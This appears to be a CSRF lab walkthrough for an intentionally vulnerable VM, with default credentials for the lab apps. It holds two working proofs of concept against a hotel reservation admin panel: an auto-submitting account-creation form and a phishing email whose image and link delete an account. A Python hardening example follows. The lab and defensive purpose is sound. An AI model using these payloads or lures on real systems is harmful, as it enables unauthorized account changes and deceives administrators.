Environment
Windows 10 x64
VMware 15
CSRF-Minefield-V1.0 target VM
Download the target VM, open it in VMware, and start testing.
Overview of the test targets
1. Bolt CMS 3.6.6
http://192.168.126.162/bolt | Username:admin Password:admin123
2. PilusCart 1.4.1
http://192.168.126.162/pilus | Username:admin Password:admin123
3. zzzphp CMS 1.6.1
http://192.168.126.162/zzzphp | Admin link: http://192.168.126.162/zzzphp/admin537/login.php | Username:admin Password:admin123
4. CMSSite 1.0
http://192.168.126.162/cmssite/ | Username:victor Password:victor
5. OOP CMS Blog 1.0
http://192.168.126.162/oop/ | Admin link: http://192.168.126.162/oop/admin | Username:admin Password:123
6. Integria IMS 5.0.83
http://192.168.126.162/integriaims/ | Username:admin Password:integria
7. ZeusCart 4.0
http://192.168.126.162/zeuscart/ | Admin link: http://192.168.126.162/zeuscart/admin | Username:admin Password:admin123
8. WSTMart 2.0.8
http://192.168.126.162/wstmart/ | Admin link: http://192.168.126.162/wstmart/admin.php | Username:admin Password:admin123
9. Simple Online Hotel Reservation System
http://192.168.126.162/hotelcal | Admin link: http://192.168.126.162/hotelcal/admin | Username:admin Password:admin
10. OrientDB 3.0.17 GA Community Edition
Command to start web app:/opt/orient/bin/server.sh | http://192.168.126.162:2480/studio/index.html | Username:root Password:toor
11. Apache CouchDB 2.3.1
Command to start web app:/opt/couchdb/bin/couchdb | http://192.168.126.162:5984/_utils/index.html | Username:root Password:toor
The test steps below are in no particular order.
9. Simple Online Hotel Reservation System
I. CSRF in account creation
1. Open 192.168.3.45//hotelcal/admin and log in, as shown:
Under Accounts, create a user, as shown:
2. Capture the request with Burp Suite, as shown:
The captured request contains no CSRF token. Send the request to the Burp Suite CSRF PoC extension (available from within Burp Suite), as shown:
Generate the PoC, as shown:
Save the generated PoC as csrfpoc.html. Start a local server with phpStudy and place csrfpoc.html in its www directory, then send it to the admin user by email: log in to QQ Mail,
edit the message's HTML source, save it, and click send. Log in to 163 Mail (assuming here that admin uses 163 Mail) and open the received email:
Click "clik here", and the following appears:
Here is the CSRF PoC; following the link adds the user directly.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body onload=document.getElementById('ese-csrf').submit()>
<form id="ese-csrf" action="http://192.168.3.45/hotelcal/admin/add_account.php" method="POST">
<input type="hidden" name="name" value="ese" />
<input type="hidden" name="username" value="ese" />
<input type="hidden" name="password" value="ese123" />
<input type="hidden" name="add_account" value="" />
</form>
</body>
</html>
II. CSRF in account deletion
1. Delete a user
Capture the request:
The request contains no CSRF token. Edit the CSRF PoC and send it by email:
<html>
<body>
<p>Hi Uday</p>
<p>Please Check the banner </p>
<p></p>
<p><a href="http://192.168.3.45/hotelcal/admin/delete_account.php?admin_id=8"><img alt="the banner" src="http://192.168.3.45/hotelcal/admin/delete_account.php?admin_id=8" style="width: 100px;height: 100px;"/></a></p>
<p>if the image does not load,please<a href="http://192.168.3.45/hotelcal/admin/delete_account.php?admin_id=8"> clik here </a>to download</p>
<p>Warm Regards</p>
</body>
</html>
After receiving the email, click "clik here"; the browser is redirected to the admin page and the user has been deleted, so the endpoint is vulnerable to CSRF.
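Both findings above come from the same two missing controls: the state-changing requests carry no per-session anti-CSRF token, and the delete action is reachable with a plain GET, so an image tag or a link in an email is enough to trigger it. The following Python block is an added example, not code from the Simple Online Hotel Reservation System or from the CSRF-Minefield VM. It models add_account.php and delete_account.php as hypothetical handlers, adds a synchronizer-token check with an Origin/Referer sanity check, refuses GET on the delete endpoint, and replays the two forged requests from the PoCs next to a legitimate one. The host 192.168.126.162 is the lab VM's address from the target list; the session store, the sample accounts and the webmail.example origin are constructed.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Added example: a hypothetical server-side model of the two hotelcal admin
# endpoints shown in the PoCs, hardened with a synchronizer token. This is not
# the application's own code.

TRUSTED_HOST = "192.168.126.162"      # the lab VM's host, from the target list


@dataclass
class Session:
    user: str
    # One random token per session; forms must echo it back.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    method: str
    path: str
    cookies: dict
    params: dict                      # form fields or query-string values
    headers: dict = field(default_factory=dict)


SESSIONS: dict = {}                   # session id -> Session (constructed in-memory store)
ACCOUNTS: dict = {8: "uday"}          # admin_id -> username (constructed sample data)


def login(user: str) -> str:
    """Create a session and return its id (what the PHPSESSID cookie would carry)."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = Session(user=user)
    return sid


def csrf_ok(req: Request, session: Session) -> bool:
    """Synchronizer-token check plus an Origin/Referer sanity check."""
    sent = req.params.get("csrf_token", "")
    # Constant-time compare so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(sent, session.csrf_token):
        return False
    # If the browser sent Origin or Referer, it must name our own host.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source and urlsplit(source).hostname != TRUSTED_HOST:
        return False
    return True


def handle(req: Request) -> tuple:
    """Dispatch a request; returns (status, message)."""
    session = SESSIONS.get(req.cookies.get("PHPSESSID", ""))
    if session is None:
        return 401, "login required"
    if req.path == "/hotelcal/admin/add_account.php":
        if req.method != "POST":
            return 405, "POST required"
        if not csrf_ok(req, session):
            return 403, "CSRF token missing or invalid"
        new_id = max(ACCOUNTS) + 1
        ACCOUNTS[new_id] = req.params["username"]
        return 200, f"account {new_id} created"
    if req.path == "/hotelcal/admin/delete_account.php":
        # A state change reachable by GET is exactly what the <img src=...> and
        # the "clik here" link in the PoC rely on; require POST plus a token.
        if req.method != "POST":
            return 405, "POST required"
        if not csrf_ok(req, session):
            return 403, "CSRF token missing or invalid"
        ACCOUNTS.pop(int(req.params.get("admin_id", -1)), None)
        return 200, "account deleted"
    return 404, "not found"


def run_demo() -> dict:
    """Replay the two forged requests from the PoCs and one legitimate request."""
    sid = login("admin")
    cookie = {"PHPSESSID": sid}       # the victim's browser attaches this automatically
    forged_add = Request("POST", "/hotelcal/admin/add_account.php", cookie,
                         {"name": "ese", "username": "ese", "password": "ese123",
                          "add_account": ""},
                         {"Origin": "http://webmail.example"})             # constructed
    forged_delete = Request("GET", "/hotelcal/admin/delete_account.php", cookie,
                            {"admin_id": "8"},
                            {"Referer": "http://webmail.example/mail.html"})  # constructed
    legit_add = Request("POST", "/hotelcal/admin/add_account.php", cookie,
                        {"name": "ese", "username": "ese", "password": "ese123",
                         "add_account": "", "csrf_token": SESSIONS[sid].csrf_token},
                        {"Origin": f"http://{TRUSTED_HOST}"})
    return {
        "forged_add": handle(forged_add)[0],
        "forged_delete": handle(forged_delete)[0],
        "legit_add": handle(legit_add)[0],
        "accounts": dict(ACCOUNTS),
    }


if __name__ == "__main__":
    print(run_demo())
```

Run it directly to see the status codes: the forged POST is refused with 403 because a cross-site page cannot read the victim's token, and the forged GET is refused with 405 before any deletion happens, while the request that carries the session's token succeeds. Marking the session cookie SameSite=Lax is a worthwhile extra layer (it would withhold the cookie on the cross-site form POST and on the image request), but it does not protect a GET endpoint reached through a top-level link such as the "clik here" anchor, which is why the server-side token and method checks are still needed.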